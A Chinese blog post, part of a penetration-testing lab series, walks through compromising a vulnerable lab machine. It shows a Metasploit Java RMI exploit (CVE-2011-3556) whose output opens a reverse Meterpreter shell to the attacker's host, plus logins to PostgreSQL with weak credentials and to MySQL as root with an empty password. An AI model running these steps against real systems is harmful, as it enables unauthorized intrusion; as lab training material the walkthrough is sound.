渗透测试靶机实战---系统篇03

(续) 渗透测试靶机实战---02

7. Java RMI Server Insecure Default Configuration Remote Code Execution Vulnerability

msf5 exploit(linux/misc/drb_remote_codeexec) > search java_RMI 

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  auxiliary/gather/java_rmi_registry                               normal     No     Java RMI Registry Interfaces Enumeration
   1  auxiliary/scanner/misc/java_rmi_server          2011-10-15       normal     Yes    Java RMI Server Insecure Endpoint Code Execution Scanner
   2  exploit/multi/browser/java_rmi_connection_impl  2010-03-31       excellent  No     Java RMIConnectionImpl Deserialization Privilege Escalation
   3  exploit/multi/misc/java_rmi_server              2011-10-15       excellent  No     Java RMI Server Insecure Default Configuration Java Code Execution


msf5 exploit(linux/misc/drb_remote_codeexec) > use exploit/multi/misc/java_rmi_server
msf5 exploit(multi/misc/java_rmi_server) > show info

       Name: Java RMI Server Insecure Default Configuration Java Code Execution
     Module: exploit/multi/misc/java_rmi_server
   Platform: Java, Linux, OSX, Solaris, Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-10-15

Provided by:
  mihi

Available targets:
  Id  Name
  --  ----
  0   Generic (Java Payload)
  1   Windows x86 (Native Payload)
  2   Linux x86 (Native Payload)
  3   Mac OS X PPC (Native Payload)
  4   Mac OS X x86 (Native Payload)

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      1099             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL for incoming connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                     no        The URI to use for this exploit (default is random)

Payload information:
  Avoid: 0 characters

Description:
  This module takes advantage of the default configuration of the RMI 
  Registry and RMI Activation services, which allow loading classes 
  from any remote (HTTP) URL. As it invokes a method in the RMI 
  Distributed Garbage Collector which is available via every RMI 
  endpoint, it can be used against both rmiregistry and rmid, and 
  against most other (custom) RMI endpoints as well. Note that it does 
  not work against Java Management Extension (JMX) ports since those 
  do not support remote class loading, unless another RMI endpoint is 
  active in the same Java process. RMI method calls do not support or 
  require any sort of authentication.

References:
  http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html
  http://www.securitytracker.com/id?1026215
  https://cvedetails.com/cve/CVE-2011-3556/

msf5 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.10.149
RHOSTS => 192.168.10.149
msf5 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.11.135:4444 
[*] 192.168.10.149:1099 - Using URL: http://0.0.0.0:8080/7LJx65WYnvMx
[*] 192.168.10.149:1099 - Local IP: http://192.168.11.135:8080/7LJx65WYnvMx
[*] 192.168.10.149:1099 - Server started.
[*] 192.168.10.149:1099 - Sending RMI Header...
[*] 192.168.10.149:1099 - Sending RMI Call...
[*] 192.168.10.149:1099 - Replied to request for payload JAR
[*] Sending stage (53845 bytes) to 192.168.10.149
[*] Meterpreter session 3 opened (192.168.11.135:4444 -> 192.168.10.149:33325) at 2019-10-12 17:29:09 +0800
[*] 192.168.10.149:1099 - Server stopped.

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > cd /
meterpreter > ls
Listing: /
==========

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100667/rw-rw-rwx  138      fil   2019-10-12 16:10:34 +0800  .aMndSYRKN0SFWvXN
40666/rw-rw-rw-   4096     dir   2012-05-14 11:35:33 +0800  bin
40666/rw-rw-rw-   1024     dir   2012-05-14 11:36:28 +0800  boot
40666/rw-rw-rw-   4096     dir   2010-03-17 06:55:51 +0800  cdrom
40666/rw-rw-rw-   13440    dir   2019-10-12 09:20:55 +0800  dev
40666/rw-rw-rw-   4096     dir   2019-10-12 16:04:38 +0800  etc
40666/rw-rw-rw-   4096     dir   2010-04-16 14:16:02 +0800  home
40666/rw-rw-rw-   4096     dir   2010-03-17 06:57:40 +0800  initrd
100666/rw-rw-rw-  7929183  fil   2012-05-14 11:35:56 +0800  initrd.img
40666/rw-rw-rw-   4096     dir   2012-05-14 11:35:22 +0800  lib
40666/rw-rw-rw-   16384    dir   2010-03-17 06:55:15 +0800  lost+found
40666/rw-rw-rw-   4096     dir   2010-03-17 06:55:52 +0800  media
40666/rw-rw-rw-   4096     dir   2010-04-29 04:16:56 +0800  mnt
100666/rw-rw-rw-  14672    fil   2019-10-12 16:10:35 +0800  nohup.out
40666/rw-rw-rw-   4096     dir   2010-03-17 06:57:39 +0800  opt
40666/rw-rw-rw-   0        dir   2019-10-12 09:20:18 +0800  proc
40666/rw-rw-rw-   4096     dir   2019-10-12 09:21:07 +0800  root
40666/rw-rw-rw-   4096     dir   2012-05-14 09:54:53 +0800  sbin
40666/rw-rw-rw-   4096     dir   2010-03-17 06:57:38 +0800  srv
40666/rw-rw-rw-   0        dir   2019-10-12 09:20:19 +0800  sys
40666/rw-rw-rw-   4096     dir   2019-10-12 16:25:12 +0800  tmp
40666/rw-rw-rw-   4096     dir   2010-04-28 12:06:37 +0800  usr
40666/rw-rw-rw-   4096     dir   2010-03-17 22:08:23 +0800  var
100666/rw-rw-rw-  1987288  fil   2008-04-11 00:55:41 +0800  vmlinuz

meterpreter > 

利用metasplit可以直接进入系统如上;

 


8. PostgreSQL weak password

渗透测试靶机实战---系统篇03_第1张图片

openVAS已经扫出了用户名/密码,使用mputty的登录方式如下,可以正常进入系统。

渗透测试靶机实战---系统篇03_第2张图片

 

 


9.MySQL / MariaDB weak password

渗透测试靶机实战---系统篇03_第3张图片

连接进入系统的方式如下:

root@kali:~#  mysql -u root -p -h 192.168.10.149 -P 3306
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 543
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases
    -> ;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.05 sec)

MySQL [(none)]>

上面让输入密码的地方,直接敲击Enter键就可以了,通过show databases命令可以系统所有的databases显示出来。

 


(未完待续) 渗透测试靶机实战---04

你可能感兴趣的:(渗透测试)